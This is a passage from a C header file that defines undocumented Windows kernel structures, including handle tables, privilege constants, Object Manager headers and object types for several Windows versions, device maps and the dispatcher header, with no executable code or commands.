ObjectTypeIndex;\n ULONG HandleAttributes;\n ULONG Reserved;\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;\n\ntypedef struct _SYSTEM_HANDLE_INFORMATION_EX {\n ULONG_PTR NumberOfHandles;\n ULONG_PTR Reserved;\n SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];\n} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;\n\n/*\n** HANDLE END\n*/\n\n// Privileges\n\n#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L)\n#define SE_CREATE_TOKEN_PRIVILEGE (2L)\n#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L)\n#define SE_LOCK_MEMORY_PRIVILEGE (4L)\n#define SE_INCREASE_QUOTA_PRIVILEGE (5L)\n#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L)\n#define SE_TCB_PRIVILEGE (7L)\n#define SE_SECURITY_PRIVILEGE (8L)\n#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L)\n#define SE_LOAD_DRIVER_PRIVILEGE (10L)\n#define SE_SYSTEM_PROFILE_PRIVILEGE (11L)\n#define SE_SYSTEMTIME_PRIVILEGE (12L)\n#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L)\n#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L)\n#define SE_CREATE_PAGEFILE_PRIVILEGE (15L)\n#define SE_CREATE_PERMANENT_PRIVILEGE (16L)\n#define SE_BACKUP_PRIVILEGE (17L)\n#define SE_RESTORE_PRIVILEGE (18L)\n#define SE_SHUTDOWN_PRIVILEGE (19L)\n#define SE_DEBUG_PRIVILEGE (20L)\n#define SE_AUDIT_PRIVILEGE (21L)\n#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L)\n#define SE_CHANGE_NOTIFY_PRIVILEGE (23L)\n#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L)\n#define SE_UNDOCK_PRIVILEGE (25L)\n#define SE_SYNC_AGENT_PRIVILEGE (26L)\n#define SE_ENABLE_DELEGATION_PRIVILEGE (27L)\n#define SE_MANAGE_VOLUME_PRIVILEGE (28L)\n#define SE_IMPERSONATE_PRIVILEGE (29L)\n#define SE_CREATE_GLOBAL_PRIVILEGE (30L)\n#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L)\n#define SE_RELABEL_PRIVILEGE (32L)\n#define SE_INC_WORKING_SET_PRIVILEGE (33L)\n#define SE_TIME_ZONE_PRIVILEGE (34L)\n#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L)\n#define SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE (36L)\n#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE\n\n//\n// Generic test for success on any status value (non-negative numbers\n// indicate success).\n//\n\n#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)\n\n//\n// Generic test for information on any status value.\n//\n\n#define NT_INFORMATION(Status) ((ULONG)(Status) >> 30 == 1)\n\n//\n// Generic test for warning on any status value.\n//\n\n#define NT_WARNING(Status) ((ULONG)(Status) >> 30 == 2)\n\n//\n// Generic test for error on any status value.\n//\n\n#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3)\n\n\n/*\n** OBJECT MANAGER START\n*/\n\n//\n// Header flags\n//\n\n#define OB_FLAG_NEW_OBJECT 0x01\n#define OB_FLAG_KERNEL_OBJECT 0x02\n#define OB_FLAG_CREATOR_INFO 0x04\n#define OB_FLAG_EXCLUSIVE_OBJECT 0x08\n#define OB_FLAG_PERMANENT_OBJECT 0x10\n#define OB_FLAG_DEFAULT_SECURITY_QUOTA 0x20\n#define OB_FLAG_SINGLE_HANDLE_ENTRY 0x40\n#define OB_FLAG_DELETED_INLINE 0x80\n\n//\n// InfoMask values\n//\n\n#define OB_INFOMASK_PROCESS_INFO 0x10\n#define OB_INFOMASK_QUOTA 0x08\n#define OB_INFOMASK_HANDLE 0x04\n#define OB_INFOMASK_NAME 0x02\n#define OB_INFOMASK_CREATOR_INFO 0x01\n\n#define OBJ_INVALID_SESSION_ID 0xFFFFFFFF\n#define NUMBER_HASH_BUCKETS 37\n\ntypedef struct _OBJECT_DIRECTORY_ENTRY {\n PVOID ChainLink;\n PVOID Object;\n ULONG HashValue;\n} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;\n\ntypedef struct _EX_PUSH_LOCK {\n union {\n struct {\n ULONG_PTR Locked : 1;\n ULONG_PTR Waiting : 1;\n ULONG_PTR Waking : 1;\n ULONG_PTR MultipleShared : 1;\n ULONG_PTR Shared : sizeof(ULONG_PTR) * 8 - 4;\n };\n ULONG_PTR Value;\n PVOID Ptr;\n };\n} EX_PUSH_LOCK, *PEX_PUSH_LOCK;\n\ntypedef struct _EX_PUSH_LOCK_AUTO_EXPAND_STATE {\n union {\n struct {\n ULONG Expanded : 1;\n ULONG Transitioning : 1;\n ULONG Pageable : 1;\n };\n ULONG Value;\n };\n} EX_PUSH_LOCK_AUTO_EXPAND_STATE, *PEX_PUSH_LOCK_AUTO_EXPAND_STATE; /* size: 0x0004 */\n\ntypedef struct _EX_PUSH_LOCK_AUTO_EXPAND {\n EX_PUSH_LOCK LocalLock;\n EX_PUSH_LOCK_AUTO_EXPAND_STATE State;\n ULONG Stats;\n} EX_PUSH_LOCK_AUTO_EXPAND, *PEX_PUSH_LOCK_AUTO_EXPAND; /* size: 0x0010 */\n\ntypedef struct _OBJECT_NAMESPACE_LOOKUPTABLE {\n LIST_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];\n EX_PUSH_LOCK Lock;\n ULONG NumberOfPrivateSpaces;\n} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE;\n\ntypedef struct _OBJECT_NAMESPACE_ENTRY {\n LIST_ENTRY ListEntry;\n PVOID NamespaceRootDirectory;\n ULONG SizeOfBoundaryInformation;\n ULONG Reserved;\n UCHAR HashValue;\n ULONG_PTR Alignment;\n} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY;\n\ntypedef enum _BOUNDARY_ENTRY_TYPE {\n OBNS_Invalid = 0,\n OBNS_Name = 1,\n OBNS_SID = 2,\n OBNS_IntegrityLabel = 3\n} BOUNDARY_ENTRY_TYPE;\n\ntypedef struct _OBJECT_BOUNDARY_ENTRY {\n BOUNDARY_ENTRY_TYPE EntryType;\n ULONG EntrySize;\n} OBJECT_BOUNDARY_ENTRY, *POBJECT_BOUNDARY_ENTRY;\n\ntypedef struct _OBJECT_BOUNDARY_DESCRIPTOR {\n ULONG Version;\n ULONG Items;\n ULONG TotalSize;\n ULONG Reserved;\n} OBJECT_BOUNDARY_DESCRIPTOR, *POBJECT_BOUNDARY_DESCRIPTOR;\n\ntypedef struct _OBJECT_DIRECTORY {\n POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];\n EX_PUSH_LOCK Lock;\n PDEVICE_MAP DeviceMap;\n ULONG SessionId;\n PVOID NamespaceEntry;\n ULONG Flags;\n} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;\n\ntypedef struct _OBJECT_DIRECTORY_V2 {\n POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];\n EX_PUSH_LOCK Lock;\n PDEVICE_MAP DeviceMap;\n POBJECT_DIRECTORY ShadowDirectory;\n ULONG SessionId;\n PVOID NamespaceEntry;\n ULONG Flags;\n LONG Padding[1];\n} OBJECT_DIRECTORY_V2, *POBJECT_DIRECTORY_V2;\n\ntypedef struct _OBJECT_DIRECTORY_V3 {\n POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];\n EX_PUSH_LOCK Lock;\n PDEVICE_MAP DeviceMap;\n POBJECT_DIRECTORY ShadowDirectory;\n PVOID NamespaceEntry;\n PVOID SessionObject;\n ULONG Flags;\n ULONG SessionId;\n} OBJECT_DIRECTORY_V3, *POBJECT_DIRECTORY_V3;\n\ntypedef struct _OBJECT_HEADER_NAME_INFO {\n POBJECT_DIRECTORY Directory;\n UNICODE_STRING Name;\n ULONG QueryReferences;\n} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;\n\ntypedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32\n LIST_ENTRY TypeList; // Size=16 Offset=0\n PVOID CreatorUniqueProcess; // Size=8 Offset=16\n USHORT CreatorBackTraceIndex; // Size=2 Offset=24\n USHORT Reserved; // Size=2 Offset=26\n} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO;\n\ntypedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16\n PVOID Process; // Size=8 Offset=0\n struct\n {\n unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24\n unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8\n };\n} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY;\n\ntypedef struct _OBJECT_HEADER_HANDLE_INFO { // Size=16\n union {\n PVOID HandleCountDataBase; // Size=8 Offset=0\n struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0\n };\n} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO;\n\ntypedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16\n PVOID ExclusiveProcess; // Size=8 Offset=0\n PVOID Reserved; // Size=8 Offset=8\n} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO;\n\ntypedef struct _OBJECT_HEADER_QUOTA_INFO {\n ULONG PagedPoolCharge; //4\n ULONG NonPagedPoolCharge; //4 \n ULONG SecurityDescriptorCharge; //4\n PVOID SecurityDescriptorQuotaBlock; //sizeof(pointer)\n unsigned __int64 Reserved; //sizeof(uint64)\n} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO;\n\ntypedef struct _OBJECT_HEADER_PADDING_INFO {\n ULONG PaddingAmount;\n} OBJECT_HEADER_PADDING_INFO, *POBJECT_HEADER_PADDING_INFO;\n\ntypedef struct _OBJECT_HEADER_AUDIT_INFO {\n PVOID SecurityDescriptor;\n PVOID Reserved;\n} OBJECT_HEADER_AUDIT_INFO, *POBJECT_HEADER_AUDIT_INFO;\n\ntypedef struct _OBJECT_HEADER_EXTENDED_INFO {\n struct _OBJECT_FOOTER *Footer;\n PVOID Reserved;\n} OBJECT_HEADER_EXTENDED_INFO, POBJECT_HEADER_EXTENDED_INFO;\n\ntypedef struct _OB_HANDLE_REVOCATION_BLOCK\n{\n LIST_ENTRY RevocationInfos;\n struct _EX_PUSH_LOCK Lock;\n struct _EX_RUNDOWN_REF Rundown;\n} OB_HANDLE_REVOCATION_BLOCK, *POB_HANDLE_REVOCATION_BLOCK;\n\ntypedef struct _OBJECT_HEADER_HANDLE_REVOCATION_INFO {\n LIST_ENTRY ListEntry;\n OB_HANDLE_REVOCATION_BLOCK* RevocationBlock;\n unsigned char Padding1[4];\n unsigned char Padding2[4];\n} OBJECT_HEADER_HANDLE_REVOCATION_INFO, *POBJECT_HEADER_HANDLE_REVOCATION_INFO;\n\ntypedef struct _QUAD {\n union {\n INT64 UseThisFieldToCopy;\n float DoNotUseThisField;\n };\n} QUAD, *PQUAD;\n\ntypedef struct _OBJECT_CREATE_INFORMATION {\n ULONG Attributes;\n PVOID RootDirectory;\n CHAR ProbeMode;\n ULONG PagedPoolCharge;\n ULONG NonPagedPoolCharge;\n ULONG SecurityDescriptorCharge;\n PVOID SecurityDescriptor;\n PSECURITY_QUALITY_OF_SERVICE SecurityQos;\n SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;\n} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;\n\ntypedef struct _SECURITY_CLIENT_CONTEXT {\n struct _SECURITY_QUALITY_OF_SERVICE SecurityQos;\n void* ClientToken;\n UCHAR DirectlyAccessClientToken;\n UCHAR DirectAccessEffectiveOnly;\n UCHAR ServerIsRemote;\n struct _TOKEN_CONTROL ClientTokenControl;\n LONG __PADDING__[1];\n} SECURITY_CLIENT_CONTEXT, *PSECURITY_CLIENT_CONTEXT;\n\ntypedef enum _POOL_TYPE {\n NonPagedPool,\n NonPagedPoolExecute = NonPagedPool,\n PagedPool,\n NonPagedPoolMustSucceed = NonPagedPool + 2,\n DontUseThisType,\n NonPagedPoolCacheAligned = NonPagedPool + 4,\n PagedPoolCacheAligned,\n NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,\n MaxPoolType,\n NonPagedPoolBase = 0,\n NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,\n NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,\n NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,\n NonPagedPoolSession = 32,\n PagedPoolSession = NonPagedPoolSession + 1,\n NonPagedPoolMustSucceedSession = PagedPoolSession + 1,\n DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,\n NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,\n PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,\n NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,\n NonPagedPoolNx = 512,\n NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,\n NonPagedPoolSessionNx = NonPagedPoolNx + 32\n} POOL_TYPE;\n\n//\n// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant.\n//\ntypedef struct _OBJECT_TYPE_INITIALIZER_COMPATIBLE {// Size=120\n USHORT Length; // Size=2 Offset=0\n UCHAR ObjectTypeFlags; // Size=1 Offset=2\n ULONG ObjectTypeCode; // Size=4 Offset=4\n ULONG InvalidAttributes; // Size=4 Offset=8\n GENERIC_MAPPING GenericMapping; // Size=16 Offset=12\n ULONG ValidAccessMask; // Size=4 Offset=28\n ULONG RetainAccess; // Size=4 Offset=32\n POOL_TYPE PoolType; // Size=4 Offset=36\n ULONG DefaultPagedPoolCharge; // Size=4 Offset=40\n ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44\n PVOID DumpProcedure; // Size=8 Offset=48\n PVOID OpenProcedure; // Size=8 Offset=56\n PVOID CloseProcedure; // Size=8 Offset=64\n PVOID DeleteProcedure; // Size=8 Offset=72\n PVOID ParseProcedure; // Size=8 Offset=80\n PVOID SecurityProcedure; // Size=8 Offset=88\n PVOID QueryNameProcedure; // Size=8 Offset=96\n PVOID OkayToCloseProcedure; // Size=8 Offset=104\n} OBJECT_TYPE_INITIALIZER_COMPATIBLE, *POBJECT_TYPE_INITIALIZER_COMPATIBLE;\n\n//\n// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant.\n//\ntypedef struct _OBJECT_TYPE_COMPATIBLE {\n LIST_ENTRY TypeList;\n UNICODE_STRING Name;\n PVOID DefaultObject;\n UCHAR Index;\n ULONG TotalNumberOfObjects;\n ULONG TotalNumberOfHandles;\n ULONG HighWaterNumberOfObjects;\n ULONG HighWaterNumberOfHandles;\n OBJECT_TYPE_INITIALIZER_COMPATIBLE TypeInfo;\n} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE;\ntypedef POBJECT_TYPE_COMPATIBLE POBJECT_TYPE;\n\n//\n// Complete definitions of OBJECT_TYPE + OBJECT_TYPE_INITIALIZER per Windows version.\n//\n\ntypedef struct _OBJECT_TYPE_INITIALIZER_7 {\n USHORT Length;\n union\n {\n UCHAR ObjectTypeFlags;\n struct\n {\n UCHAR CaseInsensitive : 1;\n UCHAR UnnamedObjectsOnly : 1;\n UCHAR UseDefaultObject : 1;\n UCHAR SecurityRequired : 1;\n UCHAR MaintainHandleCount : 1;\n UCHAR MaintainTypeList : 1;\n UCHAR SupportsObjectCallbacks : 1;\n };\n };\n ULONG ObjectTypeCode;\n ULONG InvalidAttributes;\n GENERIC_MAPPING GenericMapping;\n ULONG ValidAccessMask;\n ULONG RetainAccess;\n POOL_TYPE PoolType;\n ULONG DefaultPagedPoolCharge;\n ULONG DefaultNonPagedPoolCharge;\n PVOID DumpProcedure;\n PVOID OpenProcedure;\n PVOID CloseProcedure;\n PVOID DeleteProcedure;\n PVOID ParseProcedure;\n PVOID SecurityProcedure;\n PVOID QueryNameProcedure;\n PVOID OkayToCloseProcedure;\n} OBJECT_TYPE_INITIALIZER_7, *POBJECT_TYPE_INITIALIZER_7;\n\n//\n// Windows 8, new object type flag, WaitObject* members added\n//\ntypedef struct _OBJECT_TYPE_INITIALIZER_8 {\n USHORT Length;\n union\n {\n UCHAR ObjectTypeFlags;\n struct\n {\n UCHAR CaseInsensitive : 1;\n UCHAR UnnamedObjectsOnly : 1;\n UCHAR UseDefaultObject : 1;\n UCHAR SecurityRequired : 1;\n UCHAR MaintainHandleCount : 1;\n UCHAR MaintainTypeList : 1;\n UCHAR SupportsObjectCallbacks : 1;\n UCHAR CacheAligned : 1;\n };\n };\n ULONG ObjectTypeCode;\n ULONG InvalidAttributes;\n GENERIC_MAPPING GenericMapping;\n ULONG ValidAccessMask;\n ULONG RetainAccess;\n POOL_TYPE PoolType;\n ULONG DefaultPagedPoolCharge;\n ULONG DefaultNonPagedPoolCharge;\n PVOID DumpProcedure;\n PVOID OpenProcedure;\n PVOID CloseProcedure;\n PVOID DeleteProcedure;\n PVOID ParseProcedure;\n PVOID SecurityProcedure;\n PVOID QueryNameProcedure;\n PVOID OkayToCloseProcedure;\n ULONG WaitObjectFlagMask;\n USHORT WaitObjectFlagOffset;\n USHORT WaitObjectPointerOffset;\n} OBJECT_TYPE_INITIALIZER_8, *POBJECT_TYPE_INITIALIZER_8;\n\n//\n// Windows 10 RS1, new ObjectTypeFlags2 flag added, \n// ParseProcedure now has two variants with different parameters.\n//\ntypedef struct _OBJECT_TYPE_INITIALIZER_RS1 {\n USHORT Length;\n union\n {\n UCHAR ObjectTypeFlags;\n struct\n {\n UCHAR CaseInsensitive : 1;\n UCHAR UnnamedObjectsOnly : 1;\n UCHAR UseDefaultObject : 1;\n UCHAR SecurityRequired : 1;\n UCHAR MaintainHandleCount : 1;\n UCHAR MaintainTypeList : 1;\n UCHAR SupportsObjectCallbacks : 1;\n UCHAR CacheAligned : 1;\n };\n };\n union\n {\n UCHAR ObjectTypeFlags2; //for ParseProcedureEx\n struct\n {\n UCHAR UseExtendedParameters : 1;\n UCHAR Reserved : 7;\n };\n };\n ULONG ObjectTypeCode;\n ULONG InvalidAttributes;\n GENERIC_MAPPING GenericMapping;\n ULONG ValidAccessMask;\n ULONG RetainAccess;\n POOL_TYPE PoolType;\n ULONG DefaultPagedPoolCharge;\n ULONG DefaultNonPagedPoolCharge;\n PVOID DumpProcedure;\n PVOID OpenProcedure;\n PVOID CloseProcedure;\n PVOID DeleteProcedure;\n union {\n PVOID ParseProcedure;\n PVOID ParseProcedureEx;\n };\n PVOID SecurityProcedure;\n PVOID QueryNameProcedure;\n PVOID OkayToCloseProcedure;\n ULONG WaitObjectFlagMask;\n USHORT WaitObjectFlagOffset;\n USHORT WaitObjectPointerOffset;\n} OBJECT_TYPE_INITIALIZER_RS1, *POBJECT_TYPE_INITIALIZER_RS1;\n\n//\n// ObjectTypeFlags2 moved to extended to USHORT ObjectTypeFlags field.\n// It was that hard to do this since beginning?\n//\ntypedef struct _OBJECT_TYPE_INITIALIZER_RS2 {\n USHORT Length;\n union\n {\n USHORT ObjectTypeFlags;\n struct\n {\n UCHAR CaseInsensitive : 1;\n UCHAR UnnamedObjectsOnly : 1;\n UCHAR UseDefaultObject : 1;\n UCHAR SecurityRequired : 1;\n UCHAR MaintainHandleCount : 1;\n UCHAR MaintainTypeList : 1;\n UCHAR SupportsObjectCallbacks : 1;\n UCHAR CacheAligned : 1;\n };\n struct\n {\n UCHAR UseExtendedParameters : 1;//for ParseProcedureEx\n UCHAR Reserved : 7;\n };\n };\n ULONG ObjectTypeCode;\n ULONG InvalidAttributes;\n GENERIC_MAPPING GenericMapping;\n ULONG ValidAccessMask;\n ULONG RetainAccess;\n POOL_TYPE PoolType;\n ULONG DefaultPagedPoolCharge;\n ULONG DefaultNonPagedPoolCharge;\n PVOID DumpProcedure;\n PVOID OpenProcedure;\n PVOID CloseProcedure;\n PVOID DeleteProcedure;\n union {\n PVOID ParseProcedure;\n PVOID ParseProcedureEx;\n };\n PVOID SecurityProcedure;\n PVOID QueryNameProcedure;\n PVOID OkayToCloseProcedure;\n ULONG WaitObjectFlagMask;\n USHORT WaitObjectFlagOffset;\n USHORT WaitObjectPointerOffset;\n} OBJECT_TYPE_INITIALIZER_RS2, *POBJECT_TYPE_INITIALIZER_RS2;\n\n//\n// OBJECT_TYPE definition vary only because of OBJECT_TYPE_INITIALIZER changes.\n//\ntypedef struct _OBJECT_TYPE_7 {\n LIST_ENTRY TypeList;\n UNICODE_STRING Name;\n PVOID DefaultObject;\n UCHAR Index;\n ULONG TotalNumberOfObjects;\n ULONG TotalNumberOfHandles;\n ULONG HighWaterNumberOfObjects;\n ULONG HighWaterNumberOfHandles;\n OBJECT_TYPE_INITIALIZER_7 TypeInfo;\n EX_PUSH_LOCK TypeLock;\n ULONG Key;\n LIST_ENTRY CallbackList;\n} OBJECT_TYPE_7, POBJECT_TYPE_7;\n\ntypedef struct _OBJECT_TYPE_8 {\n LIST_ENTRY TypeList;\n UNICODE_STRING Name;\n PVOID DefaultObject;\n UCHAR Index;\n ULONG TotalNumberOfObjects;\n ULONG TotalNumberOfHandles;\n ULONG HighWaterNumberOfObjects;\n ULONG HighWaterNumberOfHandles;\n OBJECT_TYPE_INITIALIZER_8 TypeInfo;\n EX_PUSH_LOCK TypeLock;\n ULONG Key;\n LIST_ENTRY CallbackList;\n} OBJECT_TYPE_8, POBJECT_TYPE_8;\n\ntypedef struct _OBJECT_TYPE_RS1 {\n LIST_ENTRY TypeList;\n UNICODE_STRING Name;\n PVOID DefaultObject;\n UCHAR Index;\n ULONG TotalNumberOfObjects;\n ULONG TotalNumberOfHandles;\n ULONG HighWaterNumberOfObjects;\n ULONG HighWaterNumberOfHandles;\n OBJECT_TYPE_INITIALIZER_RS1 TypeInfo;\n EX_PUSH_LOCK TypeLock;\n ULONG Key;\n LIST_ENTRY CallbackList;\n} OBJECT_TYPE_RS1, POBJECT_TYPE_RS1;\n\ntypedef struct _OBJECT_TYPE_RS2 {\n LIST_ENTRY TypeList;\n UNICODE_STRING Name;\n PVOID DefaultObject;\n UCHAR Index;\n ULONG TotalNumberOfObjects;\n ULONG TotalNumberOfHandles;\n ULONG HighWaterNumberOfObjects;\n ULONG HighWaterNumberOfHandles;\n OBJECT_TYPE_INITIALIZER_RS2 TypeInfo;\n EX_PUSH_LOCK TypeLock;\n ULONG Key;\n LIST_ENTRY CallbackList;\n} OBJECT_TYPE_RS2, POBJECT_TYPE_RS2;\n\n/*\n** brand new header starting from 6.1\n*/\n\ntypedef struct _OBJECT_HEADER {\n LONG_PTR PointerCount;\n union\n {\n LONG_PTR HandleCount;\n PVOID NextToFree;\n };\n EX_PUSH_LOCK Lock;\n UCHAR TypeIndex;\n UCHAR TraceFlags;\n UCHAR InfoMask;\n UCHAR Flags;\n union\n {\n POBJECT_CREATE_INFORMATION ObjectCreateInfo;\n PVOID QuotaBlockCharged;\n };\n PVOID SecurityDescriptor;\n QUAD Body;\n} OBJECT_HEADER, *POBJECT_HEADER;\n\n//\n// Actual object header from windows 10-11.\n//\ntypedef struct _OBJECT_HEADER_X {\n LONG_PTR PointerCount;\n union\n {\n LONG_PTR HandleCount;\n PVOID NextToFree;\n };\n\n EX_PUSH_LOCK Lock;\n UCHAR TypeIndex;\n\n union\n {\n UCHAR TraceFlags;\n struct\n {\n UCHAR DbgRefTrace : 1;\n UCHAR DbgTracePermanent : 1;\n };\n };\n\n UCHAR InfoMask;\n\n union\n {\n UCHAR Flags;\n struct\n {\n UCHAR NewObject : 1;\n UCHAR KernelObject : 1;\n UCHAR KernelOnlyAccess : 1;\n UCHAR ExclusiveObject : 1;\n UCHAR PermanentObject : 1;\n UCHAR DefaultSecurityQuota : 1;\n UCHAR SingleHandleEntry : 1;\n UCHAR DeletedInline : 1;\n };\n };\n\n ULONG Reserved;\n\n union\n {\n POBJECT_CREATE_INFORMATION ObjectCreateInfo;\n PVOID QuotaBlockCharged;\n };\n\n PVOID SecurityDescriptor;\n QUAD Body;\n\n} OBJECT_HEADER_X, * POBJECT_HEADER_X;\n\n#define OBJECT_TO_OBJECT_HEADER(obj) \\\n CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )\n\n#define DOSDEVICE_DRIVE_UNKNOWN 0\n#define DOSDEVICE_DRIVE_CALCULATE 1 //e.g. symlink\n#define DOSDEVICE_DRIVE_REMOVABLE 2\n#define DOSDEVICE_DRIVE_FIXED 3\n#define DOSDEVICE_DRIVE_REMOTE 4\n#define DOSDEVICE_DRIVE_CDROM 5\n#define DOSDEVICE_DRIVE_RAMDISK 6\n\ntypedef struct _DEVICE_MAP_V1 {\n OBJECT_DIRECTORY* DosDevicesDirectory;\n OBJECT_DIRECTORY* GlobalDosDevicesDirectory;\n PVOID DosDevicesDirectoryHandle;\n ULONG ReferenceCount;\n ULONG DriveMap;\n UCHAR DriveType[32];\n} DEVICE_MAP_V1, * PDEVICE_MAP_V1;\n\ntypedef struct _DEVICE_MAP_V1 DEVICE_MAP_COMPATIBLE;\ntypedef struct _DEVICE_MAP_V1* PDEVICE_MAP_COMPATIBLE;\n\n//Since REDSTONE1 (14393)\ntypedef struct _DEVICE_MAP_V2 {\n OBJECT_DIRECTORY* DosDevicesDirectory;\n OBJECT_DIRECTORY* GlobalDosDevicesDirectory;\n PVOID DosDevicesDirectoryHandle;\n volatile LONG ReferenceCount;\n ULONG DriveMap;\n UCHAR DriveType[32];\n PEJOB ServerSilo;\n} DEVICE_MAP_V2, * PDEVICE_MAP_V2;\n\n//Since W11 (22000)\ntypedef struct _DEVICE_MAP_V3 {\n OBJECT_DIRECTORY* DosDevicesDirectory;\n OBJECT_DIRECTORY* GlobalDosDevicesDirectory;\n PEJOB ServerSilo;\n struct _DEVICE_MAP* GlobalDeviceMap;\n EX_FAST_REF DriveObject[26];\n LONGLONG ReferenceCount;\n PVOID DosDevicesDirectoryHandle;\n ULONG DriveMap;\n UCHAR DriveType[32];\n} DEVICE_MAP_V3, PDEVICE_MAP_V3;\n\n/*\n** OBJECT MANAGER END\n*/\n\n/*\n* WDM START\n*/\n#define TIMER_TOLERABLE_DELAY_BITS 6\n#define TIMER_EXPIRED_INDEX_BITS 6\n#define TIMER_PROCESSOR_INDEX_BITS 5\n\ntypedef struct _DISPATCHER_HEADER {\n union {\n union {\n volatile LONG Lock;\n LONG LockNV;\n } DUMMYUNIONNAME;\n\n struct { // Events, Semaphores, Gates, etc.\n UCHAR Type; // All (accessible via KOBJECT_TYPE)\n UCHAR Signalling;\n UCHAR Size;\n UCHAR Reserved1;\n } DUMMYSTRUCTNAME;\n\n struct { // Timer\n UCHAR TimerType;\n union {\n UCHAR TimerControlFlags;\n struct {\n UCHAR Absolute : 1;\n UCHAR Wake : 1;\n UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS;\n } DUMMYSTRUCTNAME;\n };\n\n UCHAR Hand;\n union {\n UCHAR TimerMiscFlags;\n struct {\n\n#if !defined(KENCODED_TIMER_PROCESSOR)\n\n UCHAR Index : TIMER_EXPIRED_INDEX_BITS;\n\n#else\n\n UCHAR Index : 1;\n UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS;\n\n#endif\n\n UCHAR Inserted : 1;\n volatile UCHAR Expired : 1;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n } DUMMYSTRUCTNAME2;\n\n struct { // Timer2\n UCHAR Timer2Type;\n union {\n UCHAR Timer2Flags;\n struct {\n UCHAR Timer2Inserted : 1;\n UCHAR Timer2Expiring : 1;\n UCHAR Timer2CancelPending : 1;\n UCHAR Timer2SetPending : 1;\n UCHAR Timer2Running : 1;\n UCHAR Timer2Disabled : 1;\n UCHAR Timer2ReservedFlags : 2;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n\n UCHAR Timer2Reserved1;\n UCHAR Timer2Reserved2;\n } DUMMYSTRUCTNAME3;\n\n struct { // Queue\n UCHAR QueueType;\n union {\n UCHAR QueueControlFlags;\n struct {\n UCHAR Abandoned : 1;\n UCHAR DisableIncrement : 1;\n UCHAR QueueReservedControlFlags : 6;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n\n UCHAR QueueSize;\n UCHAR QueueReserved;\n } DUMMYSTRUCTNAME4;\n\n struct { // Thread\n UCHAR ThreadType;\n UCHAR ThreadReserved;\n union {\n UCHAR ThreadControlFlags;\n struct {\n UCHAR CycleProfiling : 1;\n UCHAR CounterProfiling : 1;\n UCHAR GroupScheduling : 1;\n UCHAR AffinitySet : 1;\n UCHAR ThreadReservedControlFlags : 4;\n } DUMMYSTRUCTNAME;\n } DUMMYUNIONNAME;\n\n union {\n UCHAR DebugActive;\n\n#if !defined(_X86_)\n\n struct {\n BOOLEAN ActiveDR7 : 1;\n BOOLEAN Instrumented : 1;\n BOOLEAN Minimal : 1;\n BOOLEAN Reserved4 : 3;\n BOOLEAN UmsScheduled : 1;\n BOOLEAN UmsPrimary : 1;\n } DUMMYSTRUCTNAME;\n\n#endif\n\n } DUMMYUNIONNAME2;\n } DUMMYSTRUCTNAME5;\n\n struct { // Mutant\n UCHAR MutantType;\n 